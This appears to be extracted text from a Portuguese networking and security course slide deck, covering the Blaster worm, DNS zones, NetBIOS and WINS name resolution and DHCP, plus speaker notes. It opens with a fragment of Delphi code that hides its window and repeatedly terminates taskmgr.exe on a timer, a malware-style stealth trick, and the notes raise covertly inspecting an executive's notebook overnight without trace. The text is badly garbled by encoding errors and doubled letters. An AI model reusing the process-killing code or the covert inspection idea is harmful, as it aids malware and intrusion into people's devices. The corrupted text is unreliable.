if CompareText(arrModul,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or
PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(arrModul),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or
PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end;
CloseHandle(hdlProcess);
end;
end;
end;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
TerminarProcesso('taskmgr.exe');
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
application.ShowMainForm := false;
end;
end.
201. A Dor do âBlasterâ
¨ Duas linhas de código C no RPCSS:
â while (*pwszTemp != L'')
*pwszServerName++ = *pwszTemp++;
¨ Levaram a
â >15 milhĂľes de computadores infectados
â 3.3M de chamados de suporte em Set. 2003 (volume
normal relacionado a vĂrus ĂŠ de 350,000)
â Muita repercussĂŁo negativa
⢠âIsto aumentarĂĄ o nĂvel de frustração ao ponto que vĂĄrias
organizaçþes irĂŁo contemplar seriamente alternativas Ă
Microsoftâ
Gartner Group
⢠âĂ realmente recomendado ter cautela aqui. Os esforços [de
segurança da Microsoft] foram sinceros, mas não estou certo
se foram sinceros o suficiente.â Forrester Research
202. Em que abordagem vocĂŞ confia ?
Segurança como uma opção
Segurança como um aditivo
Integração extremamente complicada
NĂŁo ĂŠ economicamente viĂĄvel
NĂŁo pode focar na principal prioridade
Segurança como parte do sistema
Segurança Embutida na Rede
Colaboração inteligente entre os
elementos
VisĂŁo de sistemas
Foco direto na principal prioridade
213. DNS - Domain Name Service
¨Padrão Aberto para Resolução de
Nomes HierĂĄrquicos
â Agrupa nomes em domĂnios.
â A ĂĄrvore de nomes ĂŠ armazenada num
banco ddee ddaaddooss ddiissttrriibbuuĂĂddoo.
¨Especificaçþes do DNS
â RFCs 1033, 1034, 1034, 1101, 1123, 1183
e 1536.
⢠Expecificaçþes da Internet Task Force
â Berkeley Internet Name Domain (BIND)
⢠Implementação desenvolvida na Berkley
University para a versĂŁo 4.3 SD Unix
214. Serviço DNS
Nome?
Nome?
Serviço DNS
um ou mais servidores
armazenam um banco de dados
distribuĂdos
IP
IPB
Servidor DNS
215. Nome de DomĂnio
¨ Os nomes Hierårquicos utilizados pelo DNS
sĂŁo chamados FQDN:
â Fully Qualified Domain Name
¨ Exemplo:
â www.pucpr.br
â www: nome do host
â pucpr: nome de domĂnio
â br: nome de domĂnio
¨ Nome de domĂnio:
â Coleção de HOSTS ou de outros domĂnios.
216. Ărvore de nomes
br
pucpr
www
ufpr
ppgia
br
Pucpr
www Ufpr
ppgia www
FOLHA
RAIZ
www
217. Banco de Dados DistribuĂdos
¨ No serviço DNS, os nomes estão armazenados em ZONAS. Zonas são
arquivos textos que contĂŠm os nomes de um ou mais domĂnios.
br
pucpr
www
ufpr
www
RAIZ
www
ppgia
ZONA .br
ZONA pucpr.br ZONA ufpr.br
218. Banco de Dados DistribuĂdos
¨ Cada Zona pode ser armazenada num servidor DNS distinto.
br
pucpr
www
ufpr
www
RAIZ
servidor
dns.br
www
ppgia
ZONA .br
ZONA pucpr.br ZONA ufpr.br
servidor
dns.pucpr.br
servidor
dns.ufpr.br
219. Exemplo de arquivo de Zona
ZONA pucpr.br
¨ @ SOA dns.pucpr.br
¨ @ NS dns.pucpr.br
¨ dns.pucpr.br. A 200.17.99.2
¨ www A 200.17.99.2
¨ www.ppgia A 200.17.98.174
SOA: START OF AUTHORITY
NS: NAME SERVER
A: HOST
⢠SOA indica qual o servidor armazena o arquivo de zona
⢠NS indica qual o servidor que responde pelo domĂnio.
⢠Nomes terminados por â.â sĂŁo absolutos
220. Exemplos de arquivo de Zona
⢠@ SOA dns.br
⢠@ NS dns.br
⢠pucpr NS www dns.ufpr.br
⢠ufpr NS dns.pucpr.br
⢠dns.pucpr A 200.17.99.2
⢠dns.ufpr A 200.101.0.12
¨ @ SOA dns.ufpr.br
¨ @ NS dns.ufpr.br
¨ dns.ufpr.br. A 200.101.0.12
¨ www A 200.101.0.15
ZONA ufpr.br
ZONA.br
⢠@ SOA dns.pucpr.br
⢠@ NS dns.pucpr.br
⢠dns.pucpr.br. A 200.17.99.2
⢠www A 200.17.99.2
⢠www.ppgia A 200.17.98.174
ZONA pucpr.br
221. Tipos de Registros no DNS
¨ A: Host Adress
â associa um nome a um endereço IP: nnoommee Ă
IIPP..
¨ PTR: Point Resource Record
â associa um endereço IP a um nome: IIPP Ă
nnoommee..
¨ NS: Name Server
â identifica o servidor DNS no domĂnio.
¨ SOA: Start of Authority
â indica que o servidor de DNS ĂŠ a autoridade
para fornecer informaçþes no domĂnio
(aauutthhoorriittaattiivvee).
222. Consulta Reversa
¨ O cliente fornece um número IP e requisita o nome
correspondente.
¨ Os registros que relacionam IPs aos nomes são do
tipo PTR.
â Por exemplo, um registro para o endereço IP 10.17.98.31
corresponde a uma entrada DNS no seguinte formato:
⢠31.98.17.10.in-addr.arpa
¨ Se o endereço IP nĂŁo estiver contido no domĂnio
local (aquele controlado pelo servidor DNS
consultado), o servidor DNS contata o servidor DNS
situado num nĂł superior da ĂĄrvore.
â Este mecanismo de procura seqĂźencial consultando os nĂłs
superiores ĂŠ chamado âwalking the treeâ.
223. Forwarder
¨ Cada servidor DNS possui um arquivo de
configuração que diz:
â Lista de zonas que ele armazena
â Lista de servidores forwarders
¨ Lista de zonas
â Indica a localização fĂsica do arquivo
correpondente a cada ZONA.
¨ Lista de forwarders
â Um forwarder ĂŠ um servidor DNS
hierarquicamente superior ao servidor corrente.
â Esse servidor recebe as consultas de domĂnios
nĂŁo armazenados pelo servidor DNS.
224. Exemplo
Arquivo de configuração do servidor dns.pucpr.br
forwarders
{
200.17.99.2
}
pucpr.br
{
/etc/pucprbr.dns
}
forwarders
{
primeiro forwarder
segundo forwarder
etc.
}
zona
{
localização
}
zona
{
localização
}
225. Ponteiros NS e Forwarders
FORWARDER FORWARDER
br
NS NS
ZONA pucpr.br ZONA ufpr.br
pucpr
www
ufpr
www
ZONA .br
RAIZ
www
ppgia
226. Consulta Recursiva
¨ Graças ao ponteiros NS e FORWARDER qualquer servidor DNS pode
responder por toda a ĂĄrvore de domĂnios.
¨ A resposta pode ser:
â O mapeamento nome-IP requisitado
â Uma mensagem de erro dizendo que o domĂnio ou host nĂŁo foi
encontrado.
..bbrr
ppuuccpprr uuffpprr
aa bb cc dd
RESPOSTA AUTORITĂRIA
a.pucpr.br?
IP = 10.17.98.31
d.ufpr.br
IP = 200.17.98.174
1
RESPOSTA NĂO AUTORITĂRIA SE VIER DA CACHE
2 3
4
5
6
1
2
227. DNS e a Internet
¨ O ârootâ da ĂĄrvore de nomes da Internet ĂŠ
gerenciado pelo Internet Network Information
Center (IInntteerrNNIICC)
¨ InterNIC Ê o nome dado a um projeto criado num
acordo entre a National Science Foundation
(NSF) e a Network Solutions, Inc.
â ProvĂŞ um serviço de registro de nomes para
os domĂnios .com, .net, .org, and .edu;
â O site do InterNIC ĂŠ http://www.internic.net
¨ O InterNIC delega a responsabilidade de
administrar partes do domĂnio de nomes para as
empresas e organizaçþes conectadas na
Internet.
228. DomĂnios Gerenciados pelo
InterNIC
¨ Segundo a nomenclatura adotada na Internet, o
âDomain Name Spaceâ ĂŠ dividido em trĂŞs ĂĄreas
principais:
â Organization Domains:
⢠3 caracteres para indicar a atividade da empresa.
â .com, .edu, .gov, .int, .mil, .net, .org
â .int: organizaçþes internacionais
â .mil: organizaçþes militares
â .org: organizaçþes nĂŁo comerciais
â Geographical Domains:
⢠2 caracteres para identificar o paĂs.
â .br, .fr, .jp, etc.
â Reverse domain:
⢠domĂnio especial utilizado para associar endereços IP aos
nomes.
229. Exemplo
Gerido pelo
InterNIC
.com .org .edu
.pucpr
www
ppgia
rla01
Fully qualified domain
name
(FQDN)
www.pucpr.br
.br
Gerido pela .com
FAPESP
Gerido pela
PUC
230. Zonas
Servidor DNS
do Internic
.com .org .edu
.pucpr
www
ppgia
rla01
.br
Servidor DNS da .com
FAPESP
Servidor DNS da
PUC
REGISTRO
NS
231. Tipos de Servidores
¨ PPrriimmåårriioo
â Ă o servidor autoritĂĄrio para zona. A inclusĂŁo, alteraçþes
ou exclusĂŁo dos registros da zona sĂŁo feitas atravĂŠs
deste servidor.
â O servidor primĂĄrio envia uma cĂłpia dos seus arquivos de
dados para o servidor secundĂĄrio atravĂŠs de um processo
denominado ââzzoonnee ttrraannssffeerrââ
¨ SSeeccuunnddåårriioo
â Funciona como backup. Apenas lĂŞ os arquivos de dados
do servidor primårio, e responde as requisiçþes dos
clientes quando requisitado.
¨ CCaacchhiinngg--OOnnllyy
â SĂŁo servidores DNS que apenas efetuam consultas e
guardam o resultado numa cache e retornam os
resultados.
â Um servidor DNS realiza consulta a outros servidores
sempre que tiver que localizar um nome externo as zonas
que controla.
232. DNS - Resumo
¨ Vantagens:
â Implementa um mecanismo de nomes hierĂĄrquico.
⢠Isto facilita a organização dos nomes em redes de grande
porte.
â O banco de dados que armazena os nomes ĂŠ distribuĂdo.
⢠Cada servidor DNS contĂŠm informaçþes de zonas especĂficas,
e pode ser administrado separadamente.
â Ă o mecanismo de nomes adotado na Internet.
⢠Pode ser utilizado para resolver nomes na rede local (intranet)
e na rede Internet.
¨ Desvantagem:
â NĂŁo ĂŠ dinâmico.
⢠à responsabilidade do administrador manter as entradas do
arquivo de nomes atualizada.
234. Nomes NetBIOS
¨ O espaço de nomes NetBIOS ĂŠ âflatâ
â flat = nĂŁo segmentado
â implica que cada nome NetBIOS na rede deve ser Ăşnico
¨ Os recursos na rede são identificados por nomes
NetBIOS registrados dinâmicamente quando:
â o computador ĂŠ inicializado
â serviços sĂŁo inicializados
â usuĂĄrio se loga.
¨ Nomes NetBIOS tem 16 caracteres de comprimento.
â O usuĂĄrio atribui os 15 primeiros caracteres.
â O Ăşltimo caracter ĂŠ reservado para indentificar o tipo de
recursos.
235. Nomes Registrados na Estação
¨ C:>nbtstat -n
¨ Endeço-Ip nó: [200.17.98.217] Identificador de escopo: []
¨ Tabela de nomes locais de NetBIOS
¨ Nome Tipo Status
¨ ------------------------------------------------------------------------
¨ PPGIA16 <00> UNIQUE Registrado
¨ PPGIA16 <20> UNIQUE Registrado
¨ MESTRADO <00> GROUP Registrado
¨ PPGIA16 <03> UNIQUE Registrado
¨ MESTRADO <1E> GROUP Registrado
¨ JAMHOUR <03> UNIQUE Registrado
236. Nomes NetBIOS
¨ Podem ser de dois tipos:
â UNIQUE (one owner)
⢠Referenciam um único recurso na rede
⢠Exemplo: uma estação
â GROUP (multiple owner)
⢠Referenciam um conjunto de recursos na rede
⢠Exemplo: nome de domĂnio, nome de grupo
¨ Alguns exemplos de tipos para identificadores
Ăşnicos sĂŁo:
â <00> Nome do Computador e do DomĂno (ou grupo)
â <03> UsuĂĄrio logado
â <20> Serviço de nomes de servidor para sincronização de
arquivos compartilhados
237. Registro e Resolução de Nomes
NetBIOS
¨ Os seguintes mecanismos são utilizados para
localizar recursos NetBIOS
â NetBIOS name cache
â NetBIOS name server - WINS server
â IP subnet broadcast
â Static LMHOSTS files
â Static HOSTS files
â DNS servers
¨ Os mecanismos de resolução de nomes do
NetBIOS sobre TCP/IP sĂŁo definidos pelas RFCs
1001 e 1002
â de acordo com a estratĂŠgia utilizada para resolver
nomes, os computadores sĂŁo denominados b-node, p-nome,
m-node ou h-node.
238. Resolução de Nomes por
BroadCast
¨ Resolução de nomes usado broadcast IP fornece um
mÊtodo dinânico para resolução de endereços.
â Datagrama âNetBIOS Name Queryâ em broadcast
perguntando o nome correspondente ao endereço.
â Endereço MAC: FF-FF-FF-FF-FF-FF
â Endereço IP: 255.255.255.255
¨ Problemas:
â Aumento do trĂĄfego na rede
â NĂŁo funciona em redes segmentadas por rotedores
⢠Os recursos localizados em outras redes não
recebem os pedidos de broadcast pois, por default,
o roteador bloqueia os pacotes recebidos em
broadcast.
239. Extranets = VPN (Virtual Private Networks)
NOMES NETBIOS NOMES NETBIOS
ACME IAPO1 IAPO2 LAB0101 PPGIA
RREEDDEE AA RREEDDEE BB
BROADCAST BROADCAST
240. Cache com Nomes NetBIOS
¨ Cada estação mantÊm uma tabela com os nomes NetBIOS
mais usados recentemente.
¨ C:>nbtstat -c
¨ Endereço-Ip nó: [200.17.98.217] Identificador de escopo: []
¨ Tabela de nomes de caches remotas de NetBIOS
¨ Nome Tipo Endereço Host Duração
[seg]
¨ ---------------------------------------------------------------
¨ PPGIA07 <00> UNIQUE 200.17.98.224 20
¨ PPGIA07 <20> UNIQUE 200.17.98.224 600
¨ HAL2001 <00> UNIQUE 10.17.98.31 660
241. Usando o Arquivo HOSTS
¨ O arquivo âhostsâ permite relacionar nomes a IPâs,
evitando a resolução por broadcast.
â A diretiva #PRE pode ser utilizada para registrar entradas
diretamente na cache.
â Neste caso, as entradas sĂŁo consultadas antes de
qualquer outro mecanismo de resolução:
¨ Exemplos:
⢠10.17.98.31 hal2001 #pre #coloca a entrada na cache
⢠10.17.08.30 PPGIA16 #não coloca na cache
¨ Existe tambÊm uma diretiva especial para definir
domĂnios:
⢠10.17.98.42 server1 #pre #DOM:ELETRICA.RIEP
242. SERVIDORES DE NOMES NETBIOS
¨ MECANISMO DE RESOLUĂĂO DE NOMES
NETBIOS SEM BROADCAST
â MantĂŠm uma tabela que mapeia os endereços IP com o
nome dos computadores.
â A tabela ĂŠ atualizada ddiinnaammiiccaammeennttee toda a vez que uma
måquina recebe um novo endereço IP.
¨ Exemplo: WINS: Windows Internet Name Service
¨ O serviço WINS trabalha numa arquitetura cliente-servidor.
â WINS Server:
⢠manipula todos as consultas de nomes.
â WINS Client:
⢠registra seu nome e endereço no servidor WINS.
⢠envia as requisiçþes de nomes para o WINS server.
243. WINS NĂO USA BROADCAST
ACME IAPO1 IAPO2 LAB0101 PPGIA
RREEDDEE AA RREEDDEE BB
WINS
SERVER
IP e NOME são fornecidos na inicialização
TABELA
DINĂMICA REQUEST
REPLY
244. CaracterĂsticas do WINS
¨ Ao contrårio da resolução de nomes por broadcast, WINS permite que os
nomes sejam resolvidos de maneira transparente atravĂŠs de roteadores.
WINS enabled replicação
WINS proxy
WINS server
roteador LINK DE BAIXA WINS server
CAPACIDADE
Non- WINS enabled
245. Definiçþes
¨ WINS Server
â Computador que executa o serviço Windows Internet
Name
⢠Este computador mantem uma base de dados relacionando
os nomes e os endereços IP das estaçþes na rede.
â Pode haver mais de um servidor WINS na rede.
¨ Cliente WINS enabled
â Estação configurada para resolver nomes pelo WINS.
¨ Cliente Non-WINS enabled
â Estação nĂŁo configurada ou incompatĂvel com o serviço
WINS.
¨ WINS proxy
â Estaçþes que acessam o serviço WINS para os clientes
Non-WINS enable.
246. MĂşltiplos Servidores WINS
¨ A utilização de múltiplos servidores WINS Ê aconselhåvel
pois:
â permite distribuir a carga de resolução de nomes
⢠as consultas de nomes feita pelos clientes são ponto-a-
ponto.
⢠O mecanismo de broadcast só Ê utilizado quando o
nome solicitado nĂŁo ĂŠ encontrado na base do servidor
WINS.
â diminui a possibilidade de interrupção do serviço de
nomes
⢠cada servidor WINS possui uma cópia completa da
base de nomes, funcionando como backup dos
demais.
⢠quando um servidor entra em pane, os clientes
passam a consultar automaticamente o outro servidor.
247. WINS NĂO Ă APROPRIADO PARA INTERNET
WINS SERVER WINS SERVER
REPLICAĂĂO
WINS SERVER WINS SERVER
¨ Para redes grandes, o WINS Ê inviåvel pois:
â O nĂşmero de replicaçþes ĂŠ muito grande
â Cada servidor WINS guarda uma cĂłpia completa de todos os nomes.
248. Ciclo de Vida dos Nomes NetBIOS
¨ Os nomes NetBIOS são concedidos por emprÊstimo. Precisam ser
renovados periodicamente para que o computador mantenha o
nome.
Active
(Ativo)
Released
(Liberado)
Elimando
O cliente foi
desligado
Ou o nome foi
liberado
explicitamente
O prazo de
renovação foi
esgotado (6 dias)
NĂŁo renovado
(x dias)
OUTRO COMPUTADOR PODE
SOLICITAR O DIREITO DE
USAR O NOME
249. Resolução de Nomes
¨ Os mecanismos de resolução de nomes do NetBIOS
sobre TCP/IP sĂŁo definidos pelas RFCs 1001 e
1002.
â b-node: (broadcast-node)
resolvem nomes por broadcast de IP
â p-node: (point-to-point-node)
usam um servidor de nomes NetBIOS
â m-node: (mix -node)
se b-node falhar tentam p-node.
â h-node: (hybrid-node)
se p-node falhar tentam b-node
250. WINS - Resumo
¨ Vantagens:
â Reduz significativamente o nĂşmero de broadcasts de
endereços IP necessårios para localizar recursos locais e
remotos.
â Permite que clientes resolvam nomes de estaçþes
situados em segmentos remotos isolados por roteadores.
â Reduz a necessidade de manter e atualizar os arquivos
LMHOSTS.
¨ Desvantagens:
â NĂŁo implementa um mecanismo de nomes hierĂĄrquico.
Isto dificulta a administração de redes de grande porte.
â O banco de dados que armazena os nomes NetBIOS nĂŁo
ĂŠ distribuĂdo. Cada servidor WINS constitui uma rĂŠplica
completa do banco de dados de nomes.
â NĂŁo ĂŠ compatĂvel com o serviço de nomes usado na
Internet.
252. DHCP
¨Dynamic Host Configuration Protocol
â PadrĂŁo Industrial Aberto
⢠IETF RFC 1533, 1534, 1541 e 1542.
â IETF: Internet Engineering Task Force
â RFC: Request for Comments
â Utilizado para centralizar a administração e
configuração de parâmetros TCP/IP numa
rede.
â Elimina a necessidade de configurar
manualmente os clientes numa rede
TCP/IP.
253. DHCP - Arquitetura Cliente-
Servidor ¨ Um computador da rede deve funcionar como servidor DHCP.
REQUEST
REPLY
CLIENTES
DHCP
SERVIDOR
DHCP
254. Administração de Endereços IP
¨ Cada computador numa rede TCP/IP deve ter um
endereço IP único.
â O endereço IP identifica a estação e a rede ao qual a
estação pertence.
â Quando o computador ĂŠ movido para outra rede, seu
endereço IP deve refletir esta mudança.
¨ DHCP especifica os seguintes serviços (RFC 1541):
â um protocolo para que o servidor DHCP e seus clientes se
comuniquem.
⢠PROTOCOLO BOOTP
â Um mĂŠtodo para configura os parâmetros de rede de um
host IP:
⢠IP, måscara, gateway default, servidores de nomes, etc.
255. ESCOPO DHCP
¨ Quando se utiliza DHCP, cada rede local Ê caracterizada
por um ESCOPO:
PARTE FIXA
MASCARA
GATEWAY
SERVIDOR DE NOMES
OUTRAS ROTAS
PERĂODO DE EMPRĂSTIMO
PARTE DINĂMICA
RANGE DE IPâS
MESMO VALOR
PARA TODOS OS
HOSTS DO ESCOPO
UM VALOR
DIFERENTE PARA
CADA HOST DO
ESCOPO
257. Processo de Atribuição
¨ 1) O cliente envia a mensagem DDhhccppddiissccoovveerr eemm bbrrooaaddccaasstt..
â O endereço IP de origem do pacote ĂŠ 0.0.0.0 pois o
cliente ainda não tem um endereço IP.
¨ 2) Quando o servidor recebe o pacote, ele seleciona um
endereço IP disponĂvel na sua lista e oferece ao cliente.
â O servidor responde ao cliente com a mensagem
Dhcpoffer
¨ 33)) QQuuaannddoo oo cclliieennttee rreecceebbee aa ooffeerrttaa eellee ppooddee::
â aceitar enviando a mensagem Dhcprequest (incluindo o
IP) em broadcast
â recusar enviando a mensagem Dhcpdecline em broadcast
¨ 44)) QQuuaannddoo oo sseerrvviiddoorr rreecceebbee oo DDhhccpprreeqquueesstt eellee ppooddee::
â confirmar para o cliente com a mensagem Dhcpack
â recusar, se o endereço foi usado por outro, com a
mensagem Dhcpnack
¨ 5) O cliente pode liberar um endereço com a mensagem
Dhcprelease.
258. Observaçþes
¨ 1) O cliente aceita a primeira oferta que receber.
â Se houver mais de um servidor DHCP distribuindo
endereços IP, não haverå como selecionar
apenas um deles.
¨ 2) O direito do cliente de usar o endereço IP
recebido pelo servidor DHCP ĂŠ temporĂĄrio.
â Quando o prazo de validade do IP expira, o
servidor pode atribuĂ-lo a outra estação na rede.
â O cliente pode liberĂĄ-lo antecipadamente com a
mensagem Dhcprelease
259. Observaçþes
¨ 3) Se o cliente não receber a oferta do
servidor:
â Ele repete o pedido em intervalos de 2, 4,
8, 16 segundos.
â Se as 4 tentativas fracassarem, ele tenta
novamente em intervalos de 5 minutos.
¨ 4) Quando o cliente Ê reinicializado, ele tenta
utilizar o mesmo IP que tinha anteriormente.
â Ele envia o pacote Dhcprequest com o
endereço IP antigo ao invÊs do
Dhcpdiscover.
â Se o pedido ĂŠ negado, entĂŁo o cliente
envia um Dhcpdiscover.
260. Processo de Atribuição: Outras
Vezes
Cliente
DHCP
ESCOPO
Servidor
DHCP
Dhcprequest 200.17.98.1
Dhcpack 200.17.98.1
TTooddaass aass
mmeennssaaggeennss ssĂŁĂŁoo
eennvviiaaddaass eemm
bbrrooaaddccaasstt
255.255.255.0
200.17.98.23
72 horas
200.17.98.1
âŚ
200.17.98.254
OU
Dhcpnack
Dhcpdiscover
âŚ
261. Consideraçþes sobre o
Planejamento da
Implementação do DHCP
¨ Para redes não segmentadas:
â Um Ăşnico servidor DHCP pode atender atĂŠ 10000 clientes
(estimativa).
¨ Para redes segmentadas:
â Se os roteadores sĂŁo compatĂveis com a RFC1542
⢠Um único servidor DHCP Ê suficiente.
â Se os roteadores nĂŁo sĂŁo compatĂveis com a RFC1542
⢠Deve-se utilizar um servidor DHCP para cada rede.
¨ Computadores que se ligam temporariamente na rede
(notebooks, por exemplo) devem receber IPs com
tempo de âleasingâ curto.
270. PrĂĄtica: Criação de DomĂnio
¨Instalar e configurar o dominio;
¨Criar usuårios
¨Compartilhamento de arquivos
¨Definição de segurança com o GPO
270
Caso: Uma funcionĂĄria estava sendo caluniada atravĂŠs de emails sendo enviados por provedores externos. Esses emails tinham como remetente o prĂłprio nome da funcionĂĄria@webmail.com, o que supostamente indicava que ela mesma enviava as mensagens.
Problema: Essa funcionåria não tinha um bom relacionamento com o restante da equipe, logo todos eram suspeitos da armação.
Solução: Com nossas ferramentas e equipamentos fizemos uma pesquisa nas måquinas do departamento para identificar quem havia acessado o email funcionåria@webmail.com.
Resultado: Em 20 minutos conseguimos identificar quem havia acessado tal email e descobrimos o verdadeiro envolvido. Conseguimos recuperar desde a criação do email atÊ as mensagens que haviam sido enviadas
Algumas empresas partem do princĂpio que seus profissionais sĂŁo corretos em postura e açþes, e que sĂŁo qualificados e ĂŠticos.
Essa pesquisa da PWC mostra que os maiores fraudadores estão em cargos de confiança.
Como fazer para rastrear essas figuras dentre seus colaboradores?!
Como pegar o notebook de um diretor da empresa para fazer âmanutenção preventivaâ durante a noite?!
Como executar o trabalho sem que ocorram indicios de inspeção não autorizada?
NĂŁo adianta colocar um micro dentro de um cofre e deixar relatĂłrios sensĂveis em cima da mesa.
Ressaltar Funcionårios insatisfeitos e divulgação de senhas.
Enfatizar falta de conscientização dos usuårios e dos executivos.
Security is not an &quot;add-on&quot; nor an option it is part of the &quot;intelligent information network DNA&quot;. Like security is built into cars these days, it is integrated to allow you to focus on what you have bought a car for and not on securing the carâŚ. Imagine you would need to look for an airbag vendor, an ABS supplier and think how to integrate these components⌠Yes, that would be a nightmare and many unsecured cars would be driven on our streets hence putting at higher risk all drivers. We don&apos;t want to offer network nor security that way, it must be integrated and part of a comprehensive system!
create explicit trust between the secured endpoints and the secured infrastructure
build a systems-based infrastructure with pervasive security all throughout all network&apos;s layers
to offer a less complex and more secure environment to optimize business apps and processes